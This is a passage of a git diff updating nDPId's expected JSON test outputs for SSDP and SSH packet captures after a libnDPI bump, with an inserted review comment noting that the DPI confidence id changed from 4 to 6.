+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648315275444,"flow_last_seen":1648315275444,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1648315275444,"l3_proto":"ip4","src_ip":"192.168.242.50","dst_ip":"239.255.255.250","src_port":56446,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1648315276445,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1648315276445,"pkt":"AQBef\/\/68C9LCZO8CABFAADK4z8AAAERMw7AqPIy7\/\/\/+tx+B2wAtraSTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS85OS4wLjQ4NDQuNzQgTWFjIE9TIFgNCg0K"} 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1648315277449,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1648315277449,"pkt":"AQBef\/\/68C9LCZO8CABFAADKWrMAAAERu5rAqPIy7\/\/\/+tx+B2wAtraSTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS85OS4wLjQ4NDQuNzQgTWFjIE9TIFgNCg0K"} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648315275444,"flow_last_seen":1648315278446,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1648315278446,"l3_proto":"ip4","src_ip":"192.168.242.50","dst_ip":"239.255.255.250","src_port":56446,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648315275444,"flow_last_seen":1648315278446,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1648315278446,"l3_proto":"ip4","src_ip":"192.168.242.50","dst_ip":"239.255.255.250","src_port":56446,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":696,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1648315278446} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869567 bytes -~~ total memory freed........: 5869567 bytes -~~ total allocations/frees...: 118118/118118 +~~ total memory allocated....: 6003201 bytes +~~ total memory freed........: 6003201 bytes +~~ total allocations/frees...: 120880/120880 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 472 chars ~~ json string max len.......: 698 chars 
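Review bot: The numeric key inside `ndpi.confidence` changes from `"4"` to `"6"` for the same label `DPI` in both the `detected` and `idle` events of this hunk. The id is therefore not stable across libnDPI revisions, and any consumer or detection rule that matches on the number will silently stop matching. The commit message only records the submodule bump, so I would add a line such as `confidence ids changed with the libnDPI bump (DPI: 4 -> 6); match on the label, not the id`. If the repository has a JSON schema for these events, check that it does not pin the old id. The same change appears in the sql_injection, ssdp-m-search and ssh result hunks.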
diff --git a/test/results/ssdp-m-search.pcap.out b/test/results/ssdp-m-search.pcap.out index 6ff5e4c7f..f9f0dee6a 100644 --- a/test/results/ssdp-m-search.pcap.out +++ b/test/results/ssdp-m-search.pcap.out 
@@ -2,10 +2,10 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ssdp-m-search.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1532054645808} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1532054645808,"flow_last_seen":1532054645808,"flow_idle_time":200000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1532054645808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1532054645808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":63,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":63,"pkt_l4_len":29,"thread_ts_msec":1532054645808,"pkt":"\/\/\/\/\/\/\/\/AAibydCMCABFAAAxO0tAAEARmRfAqPIIwKjy\/6UNfpwAHf9xTS1TRUFSQ0ggKiBIVFRQLzEuMQ0K"} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1532054645808,"flow_last_seen":1532054645808,"flow_idle_time":200000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1532054645808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1532054645808,"flow_last_seen":1532054645808,"flow_idle_time":200000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1532054645808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1532054650808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":63,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":63,"pkt_l4_len":29,"thread_ts_msec":1532054650808,"pkt":"\/\/\/\/\/\/\/\/AAibydCMCABFAAAxSyxAAEARiTbAqPIIwKjy\/6UNfpwAHf9xTS1TRUFSQ0ggKiBIVFRQLzEuMQ0K"} 
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1532054655808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":63,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":63,"pkt_l4_len":29,"thread_ts_msec":1532054655808,"pkt":"\/\/\/\/\/\/\/\/AAibydCMCABFAAAxW1JAAEAReRDAqPIIwKjy\/6UNfpwAHf9xTS1TRUFSQ0ggKiBIVFRQLzEuMQ0K"} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1532054645808,"flow_last_seen":1532054735808,"flow_idle_time":200000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1532054735808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1532054645808,"flow_last_seen":1532054735808,"flow_idle_time":200000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1532054735808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":19,"source":"ssdp-m-search.pcap","alias":"nDPId-test","packets-captured":19,"packets-processed":19,"total-skipped-flows":0,"total-l4-payload-len":399,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1532054735808} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 19/19 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869966 bytes -~~ total memory freed........: 5869966 bytes -~~ total allocations/frees...: 118132/118132 +~~ total memory allocated....: 6003600 bytes +~~ total memory freed........: 6003600 bytes +~~ total allocations/frees...: 120894/120894 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 694 chars diff --git a/test/results/ssh.pcap.out b/test/results/ssh.pcap.out index a2baefdd9..b8f6b8fb4 100644 --- a/test/results/ssh.pcap.out +++ b/test/results/ssh.pcap.out 
@@ -4,12 +4,12 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1320435464760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1320435464760,"pkt":"AAwppUXgAFBWwAAICABFAABAek9AAEAGi52sEO4BrBDuqOQbABY3Xn+qAAAAALAC\/\/+abgAAAgQFtAEDAwMBAQgKHJWv9QAAAAAEAgAA"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1320435464760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1320435464760,"pkt":"AFBWwAAIAAwppUXgCABFAAA8AABAAEAGBfGsEO6orBDuAQAW5BtConY2N15\/q6ASFqC42wAAAgQFtAQCCAoAEyL4HJWv9QEDAwY="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1320435464760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1320435464760,"pkt":"AAwppUXgAFBWwAAICABFAAA0xzVAAEAGPsOsEO4BrBDuqOQbABY3Xn+rQqJ2N4AQ\/\/\/+RgAAAQEIChyVr\/UAEyL4"} -00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} -00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": 
{"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"","hassh_server":""}} -01062{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1320435464760,"flow_last_seen":1320435464769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":946,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1320435464769,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":""}} -01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1320435464760,"flow_last_seen":1320435464770,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":1730,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1320435464770,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": 
{"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":"B1C6C0D56317555B85C7005A3DE29325"}} -00939{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1320435464760,"flow_last_seen":1320435713237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":18498,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1320435713237,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"}} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli 
Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} +00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": 
{"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"","hassh_server":""}} +01062{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1320435464760,"flow_last_seen":1320435464769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":946,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1320435464769,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":""}} +01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1320435464760,"flow_last_seen":1320435464770,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":1730,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1320435464770,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": 
{"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":"B1C6C0D56317555B85C7005A3DE29325"}} +00939{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1320435464760,"flow_last_seen":1320435713237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":18498,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1320435713237,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","packets-captured":258,"packets-processed":258,"total-skipped-flows":0,"total-l4-payload-len":18498,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1320435713237} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ 
~~ packets captured/processed: 258/258 @@ -19,9 +19,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878929 bytes -~~ total memory freed........: 5878929 bytes -~~ total allocations/frees...: 118376/118376 +~~ total memory allocated....: 6012563 bytes +~~ total memory freed........: 6012563 bytes +~~ total allocations/frees...: 121138/121138 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 1102 chars diff --git a/test/results/ssl-cert-name-mismatch.pcap.out b/test/results/ssl-cert-name-mismatch.pcap.out index f5f301c73..af1c0176b 100644 --- a/test/results/ssl-cert-name-mismatch.pcap.out +++ b/test/results/ssl-cert-name-mismatch.pcap.out 
